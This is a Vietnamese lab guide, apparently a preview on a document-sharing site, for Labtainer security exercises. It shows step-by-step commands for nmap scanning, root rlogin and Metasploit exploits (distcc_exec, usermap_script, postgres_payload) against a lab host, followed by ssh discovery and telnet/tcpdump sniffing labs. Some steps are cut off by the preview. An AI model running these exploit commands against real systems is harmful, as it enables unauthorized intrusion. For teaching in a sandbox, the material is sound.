1. Trang chủ
  2. » Giáo Dục - Đào Tạo

Bài 1 khai thác lỗ hổng dịch vụ sử dụng metasploit

12 1 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Trang 1

Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit

Bước 1: labtainer -r metasploit

Bước 2: ifconfig

Trang 2

Bước 3: Kiểm tra kết nối bằng ping

Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2

Trang 3

Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2

Trang 4

-Trên terminal gõ: “sudo msfconsole”

-Tìm và tấn công dịch vụ distccd: search distccd

-Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec

Trang 5

- Xem cấu hình liên quan đến exploit: options

- Đặt RHOST: set RHOST 192.168.1.2

Trang 6

- Khai thác lỗ hổng: exploit

- Đọc file : cat /root/filetoview.txt

Trang 7

Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương

Bước 10: Khai thác dịch vụ Samba service (cổng 139):

“sudo msfconsole” -> search usermap_script->

->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt

Bước 12: Khai thác dịch vụ Postgres (cổng 5432):

Trang 8

“sudo msfconsole” -> search postgres_payload->use exploit/linux/postgres/postgres_payload->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 13: Kết thúc bài lab: stoplab metasploit

Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quétBước 1: Xác định IP của máy

Bước 2: Trên máy khách mycomputer sử dụng nmap để tìm ra địa chỉ IP của

Trang 9

nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port)

nằm từ 2000-3000.

Bước 3: Sau khi xác định được cổng ssh đang mở Sử dụng ssh để truy cập vào

máy chủ Tên máy chủ và mật khẩu là: ubuntu.

Trang 10

Bước 4: Sau khi truy cập được vào máy chủ friedshrimp đi tìm file

friedshrimp.txt Mở và đọc file.

Bước 5: Kết thúc bài lab: stoplab nmap-discovery

Bài 9: Sử dụng công cụ truy cập từ xa

Trang 11

Bước 1: Xác định IP của các máy

Bước 2: Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP

Bước 3: Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn chứa đoạn mật mã

Trang 12

Bước 4: Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ

Bước 5: Kết thúc bài lab: stoplab telnetlab

Ngày đăng: 10/04/2024, 10:12

Xem thêm:

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w